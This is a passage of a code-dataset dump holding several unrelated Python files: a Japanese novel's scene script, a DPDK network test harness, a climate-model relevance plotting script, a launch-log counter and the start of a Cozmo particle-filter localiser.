noto.talk(\"ところで君、お腹が空かないかね\"),\n sana.talk(\"ああ、$meはお昼はいつも適当にそこら辺で済ませたり、時間ない時は食べませんので\"),\n noto.talk(\"よし、なら、付いて来なさい\"),\n noto.do(\"そう言って立ち上がると、先生はハンガーからコートを手に取った\"),\n camera=w.sana,\n stage=w.on_hisapart,\n day=w.in_nogetpaper1, time=w.at_afternoon,\n )\n\ndef sc_changeofpace(w: World):\n sana, noto = W(w.sana), W(w.noto)\n return w.scene(\"気分転換\",\n sana.be(\"先生と歩いている\"),\n noto.talk(\"ほら、たまには気分転換も必要だろう?\"),\n sana.talk(\"原稿\"),\n noto.talk(\"まあまあ。今日はご飯をご馳走するから\"),\n noto.talk(\"あそこだ\"),\n stage=w.on_street,\n day=w.in_nogetpaper2, time=w.at_noon,\n ).omit()\n\ndef sc_lunchtime(w: World):\n sana, noto = W(w.sana), W(w.noto)\n chiyo = W(w.chiyoda)\n return w.scene(\"ランチタイム\",\n w.symbol(\"    ◆\"),\n noto.come(),\n sana.come(),\n noto.talk(\"こんにちは\"),\n chiyo.be(\"#カウンターで準備している\"),\n chiyo.talk(\"あら先生。今日はご機嫌みたいですね\"),\n sana.explain(\"先生に連れてこられたのはアパートから十分ほど歩いたところにある、喫茶店だった\",\n \"表の看板には『$on_mastercafe』とある\"),\n noto.talk(\"どちらかといえば良くはないが、今日は$a_chiyoさんの為にお客を連れてきたんだ\"),\n noto.do(\"先生はカウンターでコーヒーを落としていた黒エプロンの女性に声を掛けると、$CSを奥のテーブル席へと案内する\",\n \"店内はカウンターとテーブルで三十ほど席があったけれど、ランチタイムの割にはまだ半分以上空いていた\"),\n noto.talk(\"こっちに出てきてから何度も世話になっているんだ。うまいよ、ここのハンバーグは\"),\n noto.do(\"$CSが対面に座るなり、その顔を覗き込むようにして得意げに先生は言うと、注文を取りにやってきた黒エプロンの彼女からおしぼりを受け取って、それを広げ、顔を拭う\"),\n chiyo.talk(\"最近ご無沙汰でしたけど、お元気そうで何よりです\"),\n noto.talk(\"$meはいつもので、彼女にも同じものを頼むよ\"),\n chiyo.look(\"すらりとした体型で額がしっかり出るくらい髪を後ろでまとめ、涼やかで化粧気の薄い顔の為か、先生よりも若そうに見える\"),\n chiyo.talk(\"ハンバーグ定食ですね\", \"お飲み物はコーヒーで宜しいですか?\"),\n noto.talk(\"君もそれでいいだろう?\"),\n sana.do(\"$Sは「はい」と頷きながら、先生が自分の顔を拭ったおしぼりをコップの横に置く様をじっと観察していた\"),\n noto.talk(\"ん? 
どうしたの、$sana君?\"),\n sana.talk(\"いえ\", \"お昼なのにあまり混んでないなと\"),\n noto.do(\"そう言うと先生は顎を撫で付けながら「そうなんだよ」と微笑んだ\"),\n ## NOTE: 食事の様子を少し\n ## 潰れる店を「滅びゆく店」として描く\n ## またそれが=今の出版社の現状を暗示するように\n stage=w.on_mastercafe,\n )\n\ndef sc_lightnovel(w: World):\n sana, noto = W(w.sana), W(w.noto)\n return w.scene(\"ライトノベル\",\n w.br(),\n noto.be(\"#食べ終えて食後のコーヒーを\"),\n sana.be(\"#コーヒーを前にじっとしている\"),\n sana.explain(\"十分ほどして熱々にソースが弾けるハンバーグの載った皿を中央にした、定食セットが持ってこられた\",\n \"よくあるタイプのデミグラスソースで、脇に所謂ナポリタンのスパゲティが添えられている\"),\n noto.talk(\"これがね、小さい頃から好きでね\"),\n noto.do(\"先生はご飯よりも味噌汁よりも先にそのスパゲティから食べ始め、満足そうに頬を膨らませた\"),\n sana.do(\"$Sもそれに釣られるようにハンバーグの端を切り分け、口に入れたのだが、味は普通というか、期待通りのハンバーグだった\",\n \"そこには捻りも何もない、最近のトレンドのようにチーズが入っていたりもしないし、半熟卵も見つからない\",\n \"ごく有り触れたハンバーグなのだ\",\n \"それが嬉しくもあり懐かしくもあるのだが、何か驚きが足りない\"),\n noto.talk(\"旨いだろう?\"),\n sana.talk(\"はい、美味しいですよ\", \"ただ\"),\n noto.talk(\"その意見は食べ終えてから聞くことにするよ\",\n \"ただ、という言葉の後に褒め言葉が期待できるとは思えない\"),\n sana.talk(\"あ、すみません\", \"編プロ時代に月刊誌で食べ物系特集をやっていた頃から癖になってて\"),\n sana.do(\"更に言葉を続けようとして、先生の視線に気づき、$Sは口を噤んだ\",\n \"よくやってしまうのだ\",\n \"$geroたちもあんたと一緒に食べに行くと純粋に味わえないと苦笑している\"),\n sana.do(\"$Sは「旨い」と呟きながらハンバーグを食べる先生を前に、一言も喋らずに自分の分を食べ終えた\"),\n )\n\ndef sc_novelvalue(w: World):\n sana, noto = W(w.sana), W(w.noto)\n chiyo = W(w.chiyoda)\n return w.scene(\"小説の価値\",\n w.br(),\n noto.be(),\n sana.be(),\n noto.do(\"先生は食後のコーヒーを飲みながら「実はね」と前置きをして話し始めた\"),\n noto.talk(\"君をここに連れてきたのは少し考えてもらいたいことがあったからなんだ\"),\n sana.think(\"客が引いて店内には$Sたち以外に一人客が三人残るだけになっていた\",\n \"店員は店主らしき女性と、奥のキッチンから時々顔を見せる男性の二人だけらしい\",\n \"夫婦でやっているのかも知れない\"),\n sana.talk(\"小説についての話でしたら、いくらでも聞きますよ\"),\n noto.talk(\"また君はそうやってすぐに欲しいものだけに手を伸ばそうとするから駄目なんだよ\"),\n sana.talk(\"$meは編集者で、先生は作家です\",\n \"小説以外に話すことなんてありますか?\"),\n noto.do(\"そう言い放った$CSを一秒ほど見やった後で先生は小さく首を横に振る\"),\n noto.talk(\"君は蜘蛛の糸を掴まないタイプだね\"),\n sana.talk(\"なんですかそれは?\", \"褒めてる訳じゃありませんよね?\"),\n noto.talk(\"蜘蛛の糸と言えば芥川龍之介だよ\",\n \"死後、地獄に落とされたカンダタが生前に蜘蛛を助けたことがあったお陰で極楽に繋がる一本の蜘蛛の糸をお釈迦様に垂らしてもらえたんだ\",\n \"けれど強欲なカンダタは自分だけが助かろうとして一緒に登ろうとした他の亡者たちを蹴落とそうとした\",\n \"結局蜘蛛の糸は切れ、みんな地獄へと舞い戻ってしまったという、あの寓話だよ\"),\n sana.talk(\"それくらいは知っていますよ\",\n \"けど、何故$meはその糸を掴まないんですか?\", \"$meも極楽に行きたいですよ\"),\n noto.do(\"先生は紙ナプキンを一枚取り、そこにいくつか線を引く\",\n \"それぞれの線の先にはイチゴやケーキなど、食べ物の名前が書き込まれた\"),\n noto.talk(\"最近の若い人たちに限らないのだが、沢山ある中から自分が欲しいものの糸しか掴まないという人が多い\",\n \"バイキングで食べたいものだけを皿に盛るタイプだね\"),\n sana.think(\"確かにホテルのランチバイキングなどでは先生に言われたように、自分の食べたいものでいっぱいにする\",\n \"けれどそれと蜘蛛の糸の関係が全然見えてこない\"),\n sana.talk(\"好き嫌いをせずに食べろってことですか?\"),\n noto.talk(\"食べ物の好みの話じゃないんだよ\",\n \"うーん、そうだな。君は辞書を日常的に引くかね?\"),\n sana.talk(\"ええ、当然です\"),\n sana.do(\"と$Sは自分のスマートフォンを見せる\",\n \"電子辞書も持ち歩いてはいるが、大半は検索して済ませてしまうことが多い\"),\n noto.talk(\"それは辞書なのかね?\",\n \"そうじゃなくて、こう分厚い、あから順番に言葉を並べたものだよ\"),\n sana.talk(\"辞書くらい知ってますよ\",\n \"でも検索は別として、電子辞書で調べた方がずっと早いし、英語なんて発音まで聞けますよ?\"),\n noto.do(\"$CSがそう言うと先生は眉を寄せたまま表情を一秒ほど固めて、徐に瞼を閉じた\"),\n noto.talk(\"つまり紙の辞書は使わないということか\",\n \"辞書を引くとね、目的の言葉以外も目に付くんだよ\",\n \"例えば蜘蛛の糸を調べると、文学作品としての蜘蛛の糸以外にも言葉としての蜘蛛の糸や、蜘蛛という虫のこと、また空の雲だったり、熊だったり、苦しみだったりね、\",\n \"その周囲に色々な言葉が散らばっている\",\n \"そういったものに出会うことができる\",\n \"でも君が手にしているその道具は、そういった余分と思えることを教えてくれないだろう?\"),\n sana.do(\"ええ、と答えながらも、余分なことなら別に要らないんじゃないだろうか、としか思えない\"),\n noto.talk(\"君は何故$meがわざわざライトノベルという畑違いともいえる分野に手を出そうとしているか、きっと分からないだろうがね、\", \"&\"),\n noto.talk(\"ライトノベルは$meにとって蜘蛛の糸なんだ\"),\n sana.think(\"本当に欲しいものとは違う、ということだろうか\",\n \"$Sには先生の言いたいことがいまいち掴めず、眉を顰めるばかりだった\"),\n noto.talk(\"この店は特別なところは何もないし、客の入りも厳しい\",\n \"それでも店をやっているあの夫婦はこれで良いと言っている\",\n \"それもまた良いだろう\", \"彼らの人生だからね\"),\n chiyo.talk(\"ありがとうございました\", \"またどうぞ\"),\n sana.do(\"店の客には遂に$Sと先生の二人だけになったが、黒エプロンの彼女には特に沈んだ様子も見られない\"),\n 
noto.talk(\"あの夫婦も君と同じだ\", \"蜘蛛の糸を掴まない\",\n \"$meは蜘蛛の糸に手を伸ばそうとしている\",\n \"その違いが、分かるだろうか\"),\n sana.do(\"先生はそう言ってコーヒーの残りを飲み干すと、領収書を手にレジへと立った\"),\n ## NOTE\n ## 何故先生がラノベを書くことになったのか\n )\n\n## episode\ndef ep_spiderthread(w: World):\n return w.episode(\"3.蜘蛛のスレッド\",\n ## NOTE\n sc_noplot(w),\n sc_changeofpace(w),\n sc_lunchtime(w),\n sc_lightnovel(w),\n sc_novelvalue(w),\n )\n","sub_path":"src/spidersilk/e3_spiderthread.py","file_name":"e3_spiderthread.py","file_ext":"py","file_size_in_byte":18670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"487802086","text":"# BSD LICENSE\n#\n# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Intel Corporation nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nInterface for bulk traffic generators.\n\"\"\"\n\nimport re\nfrom time import sleep\nfrom settings import NICS\nfrom ssh_connection import SSHConnection\nfrom crb import Crb\nfrom etgen import IxiaPacketGenerator, SoftwarePacketGenerator\nfrom logger import getLogger\nfrom settings import IXIA\n\n\nclass Tester(Crb):\n\n \"\"\"\n Start the DPDK traffic generator on the machine `target`.\n A config file and pcap file must have previously been copied\n to this machine.\n \"\"\"\n PORT_INFO_CACHE_KEY = 'tester_port_info'\n CORE_LIST_CACHE_KEY = 'tester_core_list'\n NUMBER_CORES_CACHE_KEY = 'tester_number_cores'\n PCI_DEV_CACHE_KEY = 'tester_pci_dev_info'\n\n def __init__(self, crb, serializer):\n super(Tester, self).__init__(crb, serializer)\n self.NAME = 'tester'\n\n self.logger = getLogger(self.NAME)\n self.session = SSHConnection(self.get_ip_address(),\n self.NAME, self.get_password())\n self.session.init_log(self.logger)\n self.alt_session = SSHConnection(self.get_ip_address(),\n self.NAME + '_alt', self.get_password())\n self.alt_session.init_log(self.logger)\n\n self.bgProcIsRunning = False\n self.dut = None\n self.inBg = 0\n self.scapyCmds = []\n self.bgCmds = []\n self.bgItf = ''\n\n def init_ext_gen(self):\n \"\"\"\n Initialize tester packet generator object.\n \"\"\"\n if 
self.it_uses_external_generator():\n self.ixia_packet_gen = IxiaPacketGenerator(self)\n self.packet_gen = SoftwarePacketGenerator(self)\n\n def get_ip_address(self):\n \"\"\"\n Get ip address of tester CRB.\n \"\"\"\n return self.crb['tester IP']\n\n def get_password(self):\n \"\"\"\n Get tester login password of tester CRB.\n \"\"\"\n return self.crb['tester pass']\n\n def has_external_traffic_generator(self):\n \"\"\"\n Check whether performance test will base on IXIA equipment.\n \"\"\"\n try:\n if self.crb[IXIA] is not None:\n return True\n except Exception as e:\n return False\n\n return False\n\n def get_external_traffic_generator(self):\n \"\"\"\n Return IXIA object.\n \"\"\"\n return self.crb[IXIA]\n\n def it_uses_external_generator(self):\n \"\"\"\n Check whether IXIA generator is ready for performance test.\n \"\"\"\n return self.want_perf_tests and self.has_external_traffic_generator()\n\n def tester_prerequisites(self):\n \"\"\"\n Prerequest function should be called before execute any test case.\n Will call function to scan all lcore's information which on Tester.\n Then call pci scan function to collect nic device information.\n Then discovery the network topology and save it into cache file.\n At last setup DUT' environment for validation.\n \"\"\"\n self.init_core_list()\n self.pci_devices_information()\n self.restore_interfaces()\n self.scan_ports()\n\n def get_local_port(self, remotePort):\n \"\"\"\n Return tester local port connect to specified dut port.\n \"\"\"\n return self.dut.ports_map[remotePort]\n\n def get_local_port_type(self, remotePort):\n \"\"\"\n Return tester local port type connect to specified dut port.\n \"\"\"\n return self.ports_info[self.get_local_port(remotePort)]['type']\n\n def get_local_index(self, pci):\n \"\"\"\n Return tester local port index by pci id\n \"\"\"\n index = -1\n for port in self.ports_info:\n index += 1\n if pci == port['pci']:\n return index\n\n def get_pci(self, localPort):\n \"\"\"\n Return tester local port pci id.\n \"\"\"\n return self.ports_info[localPort]['pci']\n\n def get_interface(self, localPort):\n \"\"\"\n Return tester local port interface name.\n \"\"\"\n return self.ports_info[localPort]['intf']\n\n def get_mac(self, localPort):\n \"\"\"\n Return tester local port mac address.\n \"\"\"\n if self.ports_info[localPort]['type'] == 'ixia':\n return \"00:00:00:00:00:01\"\n else:\n return self.ports_info[localPort]['mac']\n\n def get_port_status(self, port):\n \"\"\"\n Return link status of ethernet.\n \"\"\"\n eth = self.ports_info[port]['intf']\n out = self.send_expect(\"ethtool %s\" % eth, \"# \")\n\n status = re.search(r\"Link detected:\\s+(yes|no)\", out)\n if not status:\n self.logger.error(\"ERROR: unexpected output\")\n\n if status.group(1) == 'yes':\n return 'up'\n else:\n return 'down'\n\n def restore_interfaces(self):\n \"\"\"\n Restore Linux interfaces.\n \"\"\"\n self.send_expect(\"modprobe igb\", \"# \", 20)\n self.send_expect(\"modprobe ixgbe\", \"# \", 20)\n self.send_expect(\"modprobe e1000e\", \"# \", 20)\n self.send_expect(\"modprobe e1000\", \"# \", 20)\n \n try:\n for (pci_bus, pci_id) in self.pci_devices_info:\n addr_array = pci_bus.split(':')\n\n self.check_Mellanox_pci(pci_bus,pci_id)\n itf = self.get_interface_name(addr_array[0], addr_array[1])\n self.send_expect(\"ifconfig %s up\" % itf, \"# \")\n\n except Exception as e:\n self.logger.error(\" !!! 
Restore ITF: \" + e.message)\n\n def scan_ports(self):\n \"\"\"\n Scan all ports on tester and save port's pci/mac/interface.\n \"\"\"\n if self.read_cache:\n self.ports_info = self.serializer.load(self.PORT_INFO_CACHE_KEY)\n\n if not self.read_cache or self.ports_info is None:\n self.scan_ports_uncached()\n if self.it_uses_external_generator():\n self.ports_info.extend(self.ixia_packet_gen.get_ports())\n self.serializer.save(self.PORT_INFO_CACHE_KEY, self.ports_info)\n\n self.logger.info(self.ports_info)\n\n def scan_ports_uncached(self):\n \"\"\"\n Return tester port pci/mac/interface information.\n \"\"\"\n self.ports_info = []\n\n for (pci_bus, pci_id) in self.pci_devices_info:\n # ignore unknown card types\n if pci_id not in NICS.values():\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id,\n \"unknow_nic\"))\n continue\n\n addr_array = pci_bus.split(':')\n bus_id = addr_array[0]\n devfun_id = addr_array[1]\n \n intf = self.get_interface_name(bus_id, devfun_id)\n \n if \"No such file\" in intf:\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id,\n \"unknow_interface\"))\n continue\n\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id, intf))\n macaddr = self.get_mac_addr(intf, bus_id, devfun_id)\n self.ports_info.append({'pci': pci_bus,\n 'type': pci_id,\n 'intf': intf,\n 'mac': macaddr})\n self.check_Mellanox_pci(pci_bus,pci_id)\n if self.isMellanox :\n intf1 = self.get_interface_name(bus_id, devfun_id)\n macaddr1 = self.get_mac_addr(intf1, bus_id, devfun_id)\n self.ports_info.append({'pci': pci_bus,\n 'type': pci_id,\n 'intf': intf1,\n 'mac': macaddr1})\n \n def send_ping6(self, localPort, ipv6, mac):\n \"\"\"\n Send ping6 packet from local port with destination ipv6 address.\n \"\"\"\n if self.ports_info[localPort]['type'] == 'ixia':\n return self.ixia_packet_gen.send_ping6(self.ports_info[localPort]['pci'], mac, ipv6)\n else:\n return self.send_expect(\"ping6 -w 5 -c 5 -A -I %s %s\" % (self.ports_info[localPort]['intf'], ipv6), \"# \", 10)\n\n def get_port_numa(self, port):\n \"\"\"\n Return tester local port numa.\n \"\"\"\n pci = self.ports_info[port]['pci']\n out = self.send_expect(\"cat /sys/bus/pci/devices/0000:%s/numa_node\" % pci, \"#\")\n return int(out)\n\n def check_port_list(self, portList, ftype='normal'):\n \"\"\"\n Check specified port is IXIA port or normal port.\n \"\"\"\n dtype = None\n plist = set()\n for txPort, rxPort, _ in portList:\n plist.add(txPort)\n plist.add(rxPort)\n\n plist = list(plist)\n if len(plist) > 0:\n dtype = self.ports_info[plist[0]]['type']\n\n for port in plist[1:]:\n if dtype != self.ports_info[port]['type']:\n return False\n\n if ftype == 'ixia' and dtype != ftype:\n return False\n\n return True\n\n def scapy_append(self, cmd):\n \"\"\"\n Append command into scapy command list.\n \"\"\"\n self.scapyCmds.append(cmd)\n\n def scapy_execute(self, timeout=60):\n \"\"\"\n Execute scapy command list.\n \"\"\"\n self.kill_all()\n\n self.send_expect(\"scapy\", \">>> \")\n if self.bgProcIsRunning:\n self.send_expect('subprocess.call(\"scapy -c sniff.py &\", shell=True)', \">>> \")\n self.bgProcIsRunning = False\n sleep(2)\n\n for cmd in self.scapyCmds:\n self.send_expect(cmd, \">>> \", timeout)\n\n sleep(2)\n self.scapyCmds = []\n self.send_expect(\"exit()\", \"# \")\n\n def scapy_background(self):\n \"\"\"\n Configure scapy running in backgroud mode which mainly purpose is\n that save RESULT into scapyResult.txt.\n \"\"\"\n self.inBg = True\n\n def scapy_foreground(self):\n \"\"\"\n Running backgroup scapy 
and convert to foregroup mode.\n \"\"\"\n self.send_expect(\"echo -n '' > scapyResult.txt\", \"# \")\n if self.inBg:\n self.scapyCmds.append('f = open(\\'scapyResult.txt\\',\\'w\\')')\n self.scapyCmds.append('f.write(RESULT)')\n self.scapyCmds.append('f.close()')\n self.scapyCmds.append('exit()')\n\n outContents = \"import os\\n\" + \\\n 'conf.color_theme=NoTheme()\\n' + 'RESULT=\"\"\\n' + \\\n \"\\n\".join(self.scapyCmds) + \"\\n\"\n self.create_file(outContents, 'sniff.py')\n\n self.logger.info('SCAPY Receive setup:\\n' + outContents)\n\n self.bgProcIsRunning = True\n self.scapyCmds = []\n self.inBg = False\n\n def scapy_get_result(self):\n \"\"\"\n Return RESULT which saved in scapyResult.txt.\n \"\"\"\n out = self.send_expect(\"cat scapyResult.txt\", \"# \")\n self.logger.info('SCAPY Result:\\n' + out + '\\n\\n\\n')\n\n return out.rpartition('[')[0]\n\n def traffic_generator_throughput(self, portList, rate_percent=100, delay=5):\n \"\"\"\n Run throughput performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.throughput(portList, rate_percent, delay)\n if not self.check_port_list(portList):\n self.logger.warning(\"exception by mixed port types\")\n return None\n return self.packet_gen.throughput(portList, rate_percent)\n\n def traffic_generator_loss(self, portList, ratePercent):\n \"\"\"\n Run loss performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.loss(portList, ratePercent)\n elif not self.check_port_list(portList):\n self.logger.warning(\"exception by mixed port types\")\n return None\n return self.packet_gen.loss(portList, ratePercent)\n\n def traffic_generator_latency(self, portList, ratePercent=100, delay=5):\n \"\"\"\n Run latency performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.latency(portList, ratePercent, delay)\n else:\n return None\n\n def extend_external_packet_generator(self, clazz, instance):\n \"\"\"\n Update packet generator function, will implement later.\n \"\"\"\n if self.it_uses_external_generator():\n self.ixia_packet_gen.__class__ = clazz\n current_attrs = instance.__dict__\n instance.__dict__ = self.ixia_packet_gen.__dict__\n instance.__dict__.update(current_attrs)\n\n def kill_all(self, killall=False):\n \"\"\"\n Kill all scapy process or DPDK application on tester.\n \"\"\"\n if not self.has_external_traffic_generator():\n self.alt_session.send_expect('killall scapy 2>/dev/null; echo tester', '# ', 5)\n if killall:\n super(Tester, self).kill_all()\n\n def close(self):\n \"\"\"\n Close ssh session and IXIA tcl session.\n \"\"\"\n super(Tester, self).close()\n if self.it_uses_external_generator():\n self.ixia_packet_gen.close()\n","sub_path":"raslan/framework/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":14833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"146126691","text":"\"\"\"\nScript to plot figure 5b\n\nAuthor : Zachary M. 
Labe\nDate : 7 July 2021\nVersion : 1 \n\"\"\"\n\n### Import packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nfrom netCDF4 import Dataset\nfrom mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid\nimport palettable.cubehelix as cm\nimport palettable.cartocolors.qualitative as cc\nimport palettable.scientific.diverging as dddd\nfrom sklearn.metrics import accuracy_score\nimport scipy.stats as sts\nimport cmocean\n\n### Plotting defaults \nplt.rc('text',usetex=True)\nplt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']}) \n\n### Parameters\ndirectorydata = '/Users/zlabe/Documents/Research/ModelComparison/Data/MSFigures_v1/'\ndirectoryfigure = '/Users/zlabe/Desktop/ModelComparison_v1/MSFigures/'\nvariablesall = 'T2M'\nscaleLRPmax = True\nallDataLabels = ['CanESM2','MPI','CSIRO-MK3.6','EC-EARTH','GFDL-CM3','GFDL-ESM2M','LENS','MM-Mean']\nletters = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\"]\n\n###############################################################################\n###############################################################################\n############################################################################### \n### Read in data\nlat1 = np.load(directorydata + 'Lat_LowerArctic.npy',allow_pickle=True)\nlon1 = np.load(directorydata + 'Lon_LowerArctic.npy',allow_pickle=True)\nlrp = np.load(directorydata + 'LRPcomposites_LowerArctic_8classes.npy',allow_pickle=True)\nlrpAA = np.load(directorydata + 'LRPcomposites_LowerArcticAA_8classes.npy',allow_pickle=True)\n\n### Prepare data for plotting\nalldata = np.append(lrp,lrpAA,axis=0)\n\n###############################################################################\n###############################################################################\n###############################################################################\n### Plot subplot of LRP means training\nlimit = np.arange(0,0.60001,0.005)\nbarlim = np.round(np.arange(0,0.601,0.6),2)\ncmap = cm.cubehelix2_16.mpl_colormap\nlabel = r'\\textbf{RELEVANCE}'\n\nfig = plt.figure(figsize=(10,3))\nfor r in range(alldata.shape[0]):\n var = alldata[r]\n \n if scaleLRPmax == True:\n var = var/np.nanmax(var)\n else:\n var = var\n \n ax1 = plt.subplot(2,alldata.shape[0]//2,r+1)\n m = Basemap(projection='npstere',boundinglat=61.3,lon_0=0,\n resolution='l',round =True,area_thresh=10000)\n m.drawcoastlines(color='darkgrey',linewidth=0.3)\n \n var, lons_cyclic = addcyclic(var, lon1)\n var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)\n lon2d, lat2d = np.meshgrid(lons_cyclic, lat1)\n x, y = m(lon2d, lat2d)\n \n circle = m.drawmapboundary(fill_color='dimgrey',color='dimgray',\n linewidth=0.7)\n circle.set_clip_on(False)\n \n cs1 = m.contourf(x,y,var,limit,extend='max')\n cs1.set_cmap(cmap) \n \n if r < 8:\n ax1.annotate(r'\\textbf{%s}' % allDataLabels[r],xy=(0,0),xytext=(0.5,1.13),\n textcoords='axes fraction',color='dimgrey',fontsize=8,\n rotation=0,ha='center',va='center')\n ax1.annotate(r'\\textbf{[%s]}' % letters[r],xy=(0,0),xytext=(0.86,0.97),\n textcoords='axes fraction',color='k',fontsize=6,\n rotation=330,ha='center',va='center')\n \nax1.annotate(r'\\textbf{1950-2004}',xy=(0,0),xytext=(-7.3,1.70),\n textcoords='axes fraction',color='k',fontsize=10,\n rotation=90,ha='center',va='center')\nax1.annotate(r'\\textbf{2005-2019}',xy=(0,0),xytext=(-7.3,0.5),\n textcoords='axes fraction',color='k',fontsize=10,\n rotation=90,ha='center',va='center')\n 
\n###############################################################################\ncbar_ax1 = fig.add_axes([0.36,0.11,0.3,0.03]) \ncbar1 = fig.colorbar(cs1,cax=cbar_ax1,orientation='horizontal',\n extend='max',extendfrac=0.07,drawedges=False)\ncbar1.set_label(label,fontsize=9,color='dimgrey',labelpad=0.7) \ncbar1.set_ticks(barlim)\ncbar1.set_ticklabels(list(map(str,barlim)))\ncbar1.ax.tick_params(axis='x', size=.01,labelsize=5)\ncbar1.outline.set_edgecolor('dimgrey')\n\nplt.tight_layout()\nplt.subplots_adjust(hspace=0.01,wspace=0.02,bottom=0.17,top=0.90)\n\nif scaleLRPmax == True:\n plt.savefig(directoryfigure + 'MS-Figure_5b_v1_scaleLRP.png',dpi=1000)\nelse:\n plt.savefig(directoryfigure + 'MS-Figure_5b_v1.png',dpi=1000)","sub_path":"Scripts/plot_MS-FIGURE_5b_v1.py","file_name":"plot_MS-FIGURE_5b_v1.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"501875073","text":"from collections import OrderedDict\n\n\ndef group_by(stream, field, success=None):\n '''Function calculates the number of years\n or months for given parameters\n '''\n short_line_length = 119\n results_dict = {}\n with stream as f:\n status = 'S' if success is True else 'F'\n header = f.readline()\n suc_index = header.index('Suc')\n year_index = header.index('Launch Date')\n mounth_index = header.index('Launch Date')+5\n next(f)\n for line in f:\n if len(line) > short_line_length:\n status_in_line = line[suc_index:suc_index+1]\n if field == 'mounth':\n field_in_line = line[mounth_index:mounth_index+3]\n else:\n field_in_line = line[year_index:year_index+4]\n if status_in_line == status or success is None:\n try:\n results_dict[field_in_line] += 1\n except:\n results_dict[field_in_line] = 1\n elif status_in_line == status or success is None:\n results_dict[field_in_line] += 1\n results_dict = OrderedDict(sorted(results_dict.items()))\n return results_dict\nresults = group_by(open(\"launchlog.txt\"), 'mounth', False)\nprint('Results:')\nfor field in results:\n print('{key} : {value}'.format(key=field, value=results[field]))\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"82968898","text":"## If you run into an \"[NSApplication _setup] unrecognized selector\" problem on macOS,\n## try uncommenting the following snippet\n\n# try:\n# import matplotlib\n# matplotlib.use('TkAgg')\n# except ImportError:\n# pass\n\n#BRIAN ZHU AND MIGUEL GARCIA\n\nfrom skimage import color\nimport cozmo\nimport numpy as np\nfrom numpy.linalg import inv\nimport threading\nimport time\nimport sys\nimport asyncio\nfrom PIL import Image\n\nfrom markers import detect, annotator\n\nfrom grid import CozGrid\nfrom gui import GUIWindow\nfrom particle import Particle, Robot\nfrom setting import *\nfrom particle_filter import *\nfrom utils import *\nfrom cozmo.util import degrees, distance_mm, speed_mmps, Pose, Angle\nfrom math import atan2\n\n#particle filter functionality\nclass ParticleFilter:\n\n def __init__(self, grid):\n self.particles = Particle.create_random(PARTICLE_COUNT, grid)\n self.grid = grid\n\n def update(self, odom, r_marker_list):\n\n # ---------- Motion model update ----------\n self.particles = motion_update(self.particles, odom)\n\n # ---------- Sensor (markers) model update ----------\n self.particles = measurement_update(self.particles, r_marker_list, self.grid)\n\n # ---------- Show current 
state ----------\n # Try to find current best estimate for display\n m_x, m_y, m_h, m_confident = compute_mean_pose(self.particles)\n return (m_x, m_y, m_h, m_confident)\n\n# tmp cache\nprev_pose = cozmo.util.Pose(0, 0, 0, angle_z=cozmo.util.Angle(degrees=0))\npicked_up_flag = False\n\n# goal location for the robot to drive to, (x, y, theta)\ngoal = (6,10,0)\n\n# map\nMap_filename = \"map_arena.json\"\ngrid = CozGrid(Map_filename)\ngui = GUIWindow(grid, show_camera=True)\npf = ParticleFilter(grid)\n\ndef compute_odometry(curr_pose, cvt_inch=True):\n '''\n Compute the odometry given the current pose of the robot (use robot.pose)\n\n Input:\n - curr_pose: a cozmo.robot.Pose representing the robot's current location\n - cvt_inch: converts the odometry into grid units\n Returns:\n - 3-tuple (dx, dy, dh) representing the odometry\n '''\n\n global prev_pose, picked_up_flag\n last_x, last_y, last_h = prev_pose.position.x, prev_pose.position.y, 